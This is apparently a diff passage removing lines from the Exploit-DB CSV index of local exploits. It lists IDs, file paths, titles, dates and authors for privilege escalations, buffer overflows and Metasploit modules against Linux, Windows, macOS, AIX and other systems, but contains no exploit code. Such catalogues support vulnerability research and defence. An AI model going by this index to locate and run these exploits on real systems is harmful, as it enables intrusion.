-23510,exploits/linux/local/23510.c,"XSOK 1.0 2 - 'LANG Environment' Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local, -23511,exploits/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local, -23581,exploits/linux/local/23581.pl,"Apache 2.0.4x mod_perl - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local, -23609,exploits/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local, -23610,exploits/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local, -23611,exploits/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local, -23634,exploits/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,linux,local, -23655,exploits/bsd/local/23655.txt,"BSD - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local, -23658,exploits/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",linux,local, -23674,exploits/linux/local/23674.txt,"Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",linux,local, -23682,exploits/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local, -23738,exploits/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local, -23739,exploits/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Local Privilege Escalation",2004-02-22,"Ian Vitek",windows,local, -23743,exploits/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Local Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local, -23759,exploits/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Local Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local, -23783,exploits/windows/local/23783.rb,"BlazeDVD 6.1 - '.PLF' File (ASLR + DEP Bypass) (Metasploit)",2012-12-31,"Craig Freyman",windows,local, -23838,exploits/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local, -23840,exploits/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,aix,local, -23841,exploits/aix/local/23841.c,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (2)",2004-03-17,mattox,aix,local, -23849,exploits/linux/local/23849.txt,"FVWM 2.4.17/2.5.8 - fvwm_make_browse_menu.sh Scripts Command Execution",2004-03-19,"Dominik Vogt",linux,local, -23874,exploits/solaris/local/23874.txt,"Sun Solaris 2.6/7.0/8/9 - vfs_getvfssw function Privilege Escalation",2004-03-23,"Sinan Eren",solaris,local, -23882,exploits/linux/local/23882.pas,"NetSupport School 7.0/7.5 - Weak Password Encryption",2004-03-26,"spiffomatic 64",linux,local, -23883,exploits/aix/local/23883.pl,"AIX 4.3.3/5.1 - Invscoutd Symbolic Link",2003-05-29,watercloud,aix,local, -23892,exploits/linux/local/23892.c,"Systrace 1.x - Local Policy Bypass",2004-03-29,Brad,linux,local, -23910,exploits/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Local Privilege Escalation",2004-04-06,"Ian Vitek",windows,local, -23921,exploits/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local, -40400,exploits/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local, -23989,exploits/windows/local/23989.c,"Microsoft Windows NT 4.0/2000 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local, -23996,exploits/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'File Memory Corruption / Arbitrary Code Execution",2013-01-09,"Debasish Mandal",windows,local, -24014,exploits/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local, -24015,exploits/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local, -24027,exploits/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local, -24043,exploits/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Memory Read",2004-04-23,"Brad Spengler",linux,local, -24062,exploits/unix/local/24062.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (1)",2004-04-25,"Secure Network Operations",unix,local, -24063,exploits/unix/local/24063.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (2)",2004-04-25,"Secure Network Operations",unix,local, -24064,exploits/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",unix,local, -24113,exploits/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation",2004-05-11,"Stefan Esser",bsd,local, -24123,exploits/linux/local/24123.sh,"WGet 1.x - Insecure File Creation Race Condition",2004-05-17,"Hugo Vazquez",linux,local, -24141,exploits/linux/local/24141.txt,"cPanel 5 < 9 - Local Privilege Escalation",2004-05-24,"Rob Brown",linux,local, -24171,exploits/windows/local/24171.c,"SmartStuff FoolProof Security Program 3.9.x - Administrative Password Recovery",2004-06-05,"Cyrillium Security",windows,local, -24173,exploits/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape functions Command Execution",2004-06-07,"Daniel Fabian",php,local, -24182,exploits/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local, -24200,exploits/windows/local/24200.txt,"Sygate Personal Firewall Pro 5.5 - Local Fail-Close Bypass",2004-06-14,"Tan Chew Keong",windows,local, -24207,exploits/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Local Buffer Overflow",2013-01-18,"Jon Bailey",windows,local, -24210,exploits/hp-ux/local/24210.pl,"HP-UX 7-11 - X Font Server Local Buffer Overflow",2003-03-10,watercloud,hp-ux,local, -24258,exploits/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Local Privilege Escalation",2013-01-20,LiquidWorm,windows,local, -24277,exploits/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow / Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local, -24278,exploits/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",linux,local, -24293,exploits/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local, -24335,exploits/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",unix,local, -24366,exploits/windows/local/24366.rb,"Microsoft Windows - Manage Memory Payload Injection (Metasploit)",2013-01-25,Metasploit,windows,local, -24374,exploits/windows/local/24374.c,"Ipswitch IMail Server 7/8 - Weak Password Encryption",1999-12-20,Adik,windows,local, -24398,exploits/linux/local/24398.sh,"IMWheel 1.0 - Predictable Temporary File Creation",2004-08-23,I)ruid,linux,local, -24406,exploits/linux/local/24406.txt,"GNU a2ps 4.13 - File Name Command Execution",2004-08-24,"Rudolf Polzer",linux,local, -24421,exploits/linux/local/24421.c,"Debian bsdmainutils 6.0.14 - Calendar Information Disclosure",2004-08-31,"Steven Van Acker",linux,local, -24458,exploits/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local, -24459,exploits/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local, -24505,exploits/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",windows,local, -24555,exploits/lin_x86-64/local/24555.c,"Linux Kernel 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Local Privilege Escalation (1)",2013-02-27,sd,lin_x86-64,local, -24570,exploits/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local, -24578,exploits/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local, -24579,exploits/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local, -24606,exploits/linux/local/24606.c,"Sudo 1.6.8 - Information Disclosure",2004-09-18,"Rosiello Security",linux,local, -24608,exploits/osx/local/24608.txt,"MacOSXLabs RsyncX 2.1 - Local Privilege Escalation",2004-09-17,"Matt Johnston",osx,local, -24609,exploits/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 - Insecure Temporary File Creation",2004-09-17,"Matt Johnston",osx,local, -24678,exploits/windows/local/24678.txt,"IBM DB2 - Universal Database Information Disclosure",2004-09-01,"Chris Anley",windows,local, -24682,exploits/windows/local/24682.c,"Microsoft Windows XP - Weak Default Configuration",2004-10-13,americanidiot,windows,local, -24694,exploits/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow",2004-10-18,xCrZx,linux,local, -24746,exploits/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local, -24749,exploits/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation (1)",2004-11-17,Gangstuck,linux,local, -24750,exploits/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation (2)",2004-11-17,Gangstuck,linux,local, -24753,exploits/windows/local/24753.txt,"Mailtraq 2.x - Administration Console Privilege Escalation",2004-11-19,"Reed Arvin",windows,local, -24754,exploits/windows/local/24754.txt,"Altiris Deployment Solution 5.6 - Client Service Privilege Escalation",2004-11-19,"Reed Arvin",windows,local, -24757,exploits/linux/local/24757.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (3)",2004-11-19,"Marc Schoenefeld",linux,local, -24758,exploits/linux/local/24758.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4)",2004-11-19,"Marc Schoenefeld",linux,local, -24863,exploits/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control",2013-03-20,Dr_IDE,windows,local, -24872,exploits/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - 'ScsiAccess.exe' Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local, -24884,exploits/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation",2013-03-25,Dr_IDE,windows,local, -24885,exploits/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Code Execution",2013-03-25,Dr_IDE,windows,local, -24899,exploits/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Local Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local, -24910,exploits/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Local Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",windows,local, -24919,exploits/windows/local/24919.py,"HexChat 2.9.4 - Local Overflow",2013-04-07,"Matt Andreko",windows,local, -24923,exploits/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",multiple,local, -24929,exploits/linux/local/24929.rb,"HP System Management Homepage - Local Privilege Escalation (Metasploit)",2013-04-08,Metasploit,linux,local, -24933,exploits/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local, -25039,exploits/aix/local/25039.txt,"IBM AIX 5.x - 'Diag' Local Privilege Escalation",2004-12-20,cees-bart,aix,local, -25040,exploits/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module - Offset Memory Corruption",2004-12-20,"Stefano Di Paola",php,local, -25055,exploits/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow",2005-01-19,nemo@felinemenace.org,osx,local, -25080,exploits/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities",2005-02-02,"Niels Heinen",linux,local, -25106,exploits/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String",2005-02-16,"Ulf Harnhammar",linux,local, -25130,exploits/windows/local/25130.py,"FuzeZip 1.0.0.131625 - Local Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local, -25131,exploits/windows/local/25131.py,"WinArchiver 3.2 - Local Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local, -25134,exploits/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE Bypass + Privilege Escalation",2013-05-01,aeon,linux,local, -25141,exploits/windows/local/25141.rb,"AudioCoder 0.8.18 - Local Buffer Overflow (SEH)",2013-05-02,metacom,windows,local, -25202,exploits/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation (1)",2005-03-09,sd,linux,local, -25204,exploits/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Local Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local, -25256,exploits/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local, -25288,exploits/linux/local/25288.c,"Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)",2005-04-08,qobaiashi,linux,local, -25289,exploits/linux/local/25289.c,"Linux Kernel 2.4.30/2.6.11.5 - BlueTooth 'bluez_sock_create' Local Privilege Escalation",2005-10-19,backdoored.net,linux,local, -25296,exploits/windows/local/25296.rb,"AudioCoder - '.m3u' Local Buffer Overflow (Metasploit)",2013-05-07,Metasploit,windows,local, -25333,exploits/unix/local/25333.c,"SCO OpenServer 5.0.6/5.0.7 - NWPrint Command Line Argument Local Buffer Overflow",2005-04-04,"pasquale minervini",unix,local, -25361,exploits/irix/local/25361.txt,"SGI IRIX 6.5.22 - GR_OSView Information Disclosure",2005-04-07,anonymous,irix,local, -25362,exploits/irix/local/25362.txt,"SGI IRIX 6.5.22 - GR_OSView Local Arbitrary File Overwrite",2005-04-07,anonymous,irix,local, -25406,exploits/linux/local/25406.sh,"Kloxo 6.1.6 - Local Privilege Escalation",2013-05-13,HTP,linux,local, -25411,exploits/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",linux,local, -25419,exploits/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Local Buffer Overflow (SEH)",2013-05-13,seaofglass,windows,local, -25444,exploits/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1)",2013-05-14,sd,linux,local, -25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,windows,local, -25450,exploits/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local, -25554,exploits/windows/local/25554.c,"Altiris Client 6.0.88 - Service Privilege Escalation",2005-04-27,"Reed Arvin",windows,local, -40394,exploits/linux/local/40394.rb,"Docker Daemon - Local Privilege Escalation (Metasploit)",2016-09-19,Metasploit,linux,local, -25607,exploits/windows/local/25607.py,"Ophcrack 3.5.0 - Code Execution Local Buffer Overflow",2013-05-21,xis_one,windows,local, -25636,exploits/windows/local/25636.txt,"Positive Software H-Sphere Winbox 2.4 - Sensitive Logfile Content Disclosure",2005-05-09,"Morning Wood",windows,local, -40393,exploits/windows/local/40393.txt,"SolarWinds Kiwi Syslog Server 9.5.1 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local, -25688,exploits/linux/local/25688.txt,"Gedit 2.x - Filename Format String",2005-05-30,jsk:exworm,linux,local, -25703,exploits/solaris/local/25703.txt,"Active News Manager - 'login.asp' SQL Injection",2005-05-25,Romty,solaris,local, -25707,exploits/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure",2005-05-26,"Markku-Juhani O. Saarinen",linux,local, -25709,exploits/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 - Insecure File Creation",2005-05-26,"Eric Romang",linux,local, -25718,exploits/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,hardware,local, -25725,exploits/windows/local/25725.rb,"AdobeCollabSync - Local Buffer Overflow / Adobe Reader X Sandbox Bypass (Metasploit)",2013-05-26,Metasploit,windows,local, -40392,exploits/linux/local/40392.py,"EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow",2016-09-19,"Juan Sacco",linux,local, -25789,exploits/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure",2005-06-06,"Miklos Szeredi",linux,local, -40389,exploits/windows/local/40389.php,"PHP 5.0.0 - 'tidy_parse_file()' Local Buffer Overflow",2016-09-19,"Yakir Wizman",windows,local, -25883,exploits/windows/local/25883.txt,"BOINC Manager (Seti@home) 7.0.64 - Field Buffer Overflow (SEH)",2013-06-02,xis_one,windows,local, -25896,exploits/solaris/local/25896.pl,"Sun Solaris 10 Traceroute - Multiple Local Buffer Overflow Vulnerabilities",2005-06-24,"Przemyslaw Frasunek",solaris,local, -25912,exploits/windows/local/25912.c,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring",2013-06-03,"Tavis Ormandy",windows,local, -25947,exploits/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite",2005-07-06,pi3ki31ny,linux,local, -25961,exploits/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local, -25993,exploits/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local, -26100,exploits/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local, -26131,exploits/lin_x86-64/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)",2013-06-11,"Andrea Bittau",lin_x86-64,local, -26185,exploits/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local, -26195,exploits/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local, -26218,exploits/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local, -26222,exploits/windows/local/26222.c,"Microsoft Windows XP/2000/2003 - Keyboard Event Privilege Escalation",2005-08-06,"Andres Tarasco",windows,local, -26242,exploits/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - '.wax' Local Buffer Overflow (SEH)",2013-06-17,Onying,windows,local, -26245,exploits/windows/local/26245.py,"Winamp 5.12 - '.m3u' Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local, -26321,exploits/linux/local/26321.c,"Gnome-PTY-Helper UTMP - Hostname Spoofing",2005-10-03,"Paul Szabo",linux,local, -26323,exploits/windows/local/26323.cpp,"Microsoft Windows XP - Wireless Zero Configuration Service Information Disclosure",2005-10-04,"Laszlo Toth",windows,local, -26352,exploits/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass",2005-10-17,anonymous,php,local, -26353,exploits/linux/local/26353.txt,"Linux Kernel 2.6 - Console Keymap Local Command Injection (PoC)",2005-10-17,"Rudolf Polzer",linux,local, -26367,exploits/windows/local/26367.py,"Adrenalin Player 2.2.5.3 - '.asx' Local Buffer Overflow (SEH)",2013-06-21,Onying,windows,local, -26368,exploits/freebsd/local/26368.c,"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation",2013-06-21,Hunger,freebsd,local, -26402,exploits/windows/local/26402.py,"Mediacoder (.lst) - Local Buffer Overflow (SEH)",2013-06-24,metacom,windows,local, -26403,exploits/windows/local/26403.py,"Mediacoder - '.m3u' Local Buffer Overflow (SEH)",2013-06-24,metacom,windows,local, -26404,exploits/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Local Buffer Overflow",2013-06-24,metacom,windows,local, -26409,exploits/windows/local/26409.py,"aSc Timetables 2013 - Local Stack Buffer Overflow",2013-06-24,Dark-Puzzle,windows,local, -26411,exploits/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Direct RETN Buffer Overflow",2013-06-24,Onying,windows,local, -26418,exploits/windows/local/26418.rb,"Novell Client 4.91 SP4 - 'nwfs.sys' Local Privilege Escalation (Metasploit)",2013-06-24,Metasploit,windows,local, -26448,exploits/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Direct RETN Buffer Overflow",2013-06-26,Onying,windows,local, -26451,exploits/linux/local/26451.rb,"ZPanel zsudo - Local Privilege Escalation (Metasploit)",2013-06-26,Metasploit,linux,local, -26452,exploits/win_x86/local/26452.rb,"Novell Client 2 SP3 - 'nicm.sys' Local Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local, -26454,exploits/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)",2013-06-26,Metasploit,freebsd,local, -26479,exploits/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,windows,local, -26492,exploits/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution",2002-12-31,"Georgi Guninski",linux,local, -26498,exploits/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",linux,local, -26520,exploits/windows/local/26520.py,"Static HTTP Server 1.0 - Local Overflow (SEH)",2013-07-01,"Jacob Holcomb",windows,local, -26523,exploits/windows/local/26523.rb,"AudioCoder (.lst) - Local Buffer Overflow (Metasploit)",2013-07-01,Asesino04,windows,local, -26525,exploits/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' Local Buffer Overflow (SEH)",2013-07-01,MrXors,windows,local, -26554,exploits/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Local Privilege Escalation (Metasploit)",2013-07-02,Metasploit,windows,local, -28085,exploits/windows/local/28085.html,"KingView 6.53 - 'KChartXY' ActiveX Remote File Creation / Overwrite",2013-09-04,blake,windows,local, -26579,exploits/windows/local/26579.rb,"ABBS Audio Media Player - '.LST' Local Buffer Overflow (Metasploit)",2013-07-03,Metasploit,windows,local, -26703,exploits/windows/local/26703.py,"Adobe Reader X 10.1.4.38 - '.BMP'/'.RLE' Heap Corruption",2013-07-08,feliam,windows,local, -26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,windows,local, -26709,exploits/lin_x86/local/26709.txt,"Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation",2013-07-09,"Larry W. Cashdollar",lin_x86,local, -26752,exploits/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local, -26753,exploits/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local, -26805,exploits/windows/local/26805.rb,"Corel PDF Fusion - Local Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,windows,local, -26889,exploits/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Direct RET Buffer Overflow",2013-07-16,PuN1sh3r,windows,local, -40385,exploits/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local, -26950,exploits/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local, -26970,exploits/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local, -26996,exploits/aix/local/26996.txt,"IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration",2005-12-30,xfocus,aix,local, -26997,exploits/aix/local/26997.txt,"IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Disclosure",2006-01-01,xfocus,aix,local, -27041,exploits/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Based Buffer Overflow",2013-07-23,jun,windows,local, -27056,exploits/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass (1)",2006-01-09,"Breno Silva Pinto",linux,local, -27057,exploits/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva Pinto",linux,local, -27065,exploits/linux/local/27065.txt,"Cray UNICOS /usr/bin/script - Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",linux,local, -27066,exploits/linux/local/27066.txt,"Cray UNICOS /etc/nu - '-c' Option Filename Processing Local Overflow",2006-01-10,"Micheal Turner",linux,local, -27168,exploits/qnx/local/27168.txt,"QNX 6.2/6.3 - Multiple Privilege Escalation / Denial of Service Vulnerabilities",2006-02-07,anonymous,qnx,local, -27191,exploits/windows/local/27191.py,"Novell Client 2 SP3 - 'nicm.sys 3.1.11.0' Local Privilege Escalation",2013-07-29,sickness,windows,local, -27231,exploits/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,linux,local, -27282,exploits/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Local Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local, -27285,exploits/hardware/local/27285.txt,"Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,local, -27296,exploits/windows/local/27296.rb,"Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) (Metasploit)",2013-08-02,Metasploit,windows,local, -27297,exploits/linux/local/27297.c,"Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,linux,local, -27316,exploits/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Local Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local, -27334,exploits/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_param' Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local, -27335,exploits/php/local/27335.txt,"PHP 4.x/5.0/5.1 - 'mb_send_mail()' Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local, -40764,exploits/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local, -40763,exploits/windows/local/40763.cs,"Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local, -27461,exploits/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - 'Sockaddr_In.Sin_Zero' Kernel Memory Disclosure",2006-03-23,"Pavel Kankovsky",linux,local, -27609,exploits/windows/local/27609.rb,"Chasys Draw IES - Local Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local, -27766,exploits/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local, -27769,exploits/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local, -27874,exploits/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Overflow",2013-08-26,"Ayman Sagy",windows,local, -27938,exploits/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)",2013-08-29,Metasploit,linux,local, -27944,exploits/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,osx,local, -27965,exploits/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Local Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local, -28084,exploits/windows/local/28084.html,"KingView 6.53 - 'SuperGrid' Insecure ActiveX Control",2013-09-04,blake,windows,local, -28130,exploits/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL (Metasploit)",2013-09-06,Metasploit,windows,local, 